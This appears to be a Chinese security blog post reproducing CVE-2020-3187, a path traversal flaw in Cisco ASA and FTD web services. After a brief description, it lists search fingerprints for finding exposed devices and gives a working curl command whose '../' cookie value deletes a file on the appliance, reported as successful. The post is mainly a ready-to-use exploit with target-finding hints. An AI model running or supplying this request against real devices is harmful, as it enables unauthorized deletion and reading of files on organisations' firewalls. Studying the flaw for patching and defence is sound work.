Cisco ASA设备任意文件删除漏洞 #CVE-2020-3187

漏洞描述

Cisco ASA Software和FTD Software中的Web服务接口存在路径遍历漏洞,该漏洞源于程序没有对HTTP URL进行正确的输入验证。远程攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。

漏洞影响

Cisco ASA设备

20240322102538525-cisco-1.85b16a9e_2024-03-22_10-25-26 (1)

Cisco FTD设备

20240322102612400-cisco-2.65de1418_2024-03-22_10-26-00 (1)

网络测绘

/+CSCOE+/

Cisco-ASA

漏洞复现

访问 http://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html 存在则可能出现此漏洞

20240322102726870-cisco-6.d227db8c_2024-03-22_10-27-10 (1)

例如我们删除一张图片 http://xxx.xxx.xxx.xxx/+CSCOU+/csco_logo.gif

20240322102756288-cisco-7.3e769c0c_2024-03-22_10-27-46 (1)

使用 curl 发送请求

curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html

20240322102838829-下载_2024-03-22_10-28-21 (1)

成功删除图标

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容